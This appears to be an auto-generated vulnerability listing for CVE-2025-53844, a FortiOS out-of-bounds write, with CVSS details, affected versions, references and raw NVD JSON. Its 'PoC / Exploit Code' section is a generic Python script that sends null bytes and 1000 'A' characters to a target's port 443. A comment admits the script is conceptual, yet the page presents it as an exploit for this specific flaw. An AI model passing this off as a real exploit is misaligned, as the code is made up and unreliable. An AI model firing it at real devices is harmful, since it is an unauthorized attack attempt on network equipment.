CVE-2025-53844

Description

A out-of-bounds write vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11 allows attacker to execute unauthorized code or commands via specially crafted packets.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

FortiOS 7.6.0 - 7.6.3

FortiOS 7.4.0 - 7.4.8

FortiOS 7.2.0 - 7.2.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import struct

# Target configuration
TARGET_IP = "192.168.1.1"
TARGET_PORT = 443  # Example port, actual vulnerable port may vary

def create_malformed_packet():
    # Construct a payload that triggers the out-of-bounds write
    # NOTE: This is a conceptual PoC. Actual offset/bytes need reverse engineering.
    header = b"\x00" * 20
    # Overflow trigger
    payload = b"A" * 1000  
    return header + payload

def send_exploit():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((TARGET_IP, TARGET_PORT))
        
        packet = create_malformed_packet()
        s.send(packet)
        print("[+] Malformed packet sent to target.")
        
        # Check for response or keep connection open
        response = s.recv(1024)
        print(f"[+] Received response: {response}")
        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    send_exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-53844
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-53844
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-53844/
[4] VulDB https://vuldb.com/cve/CVE-2025-53844
[5] https://fortiguard.fortinet.com/psirt/FG-IR-26-123

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-53844", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:35.983", "lastModified": "2026-05-12T18:57:02.307", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A out-of-bounds write vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11 allows attacker to execute unauthorized code or commands via specially crafted packets."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-123", "source": "[email protected]"}]}}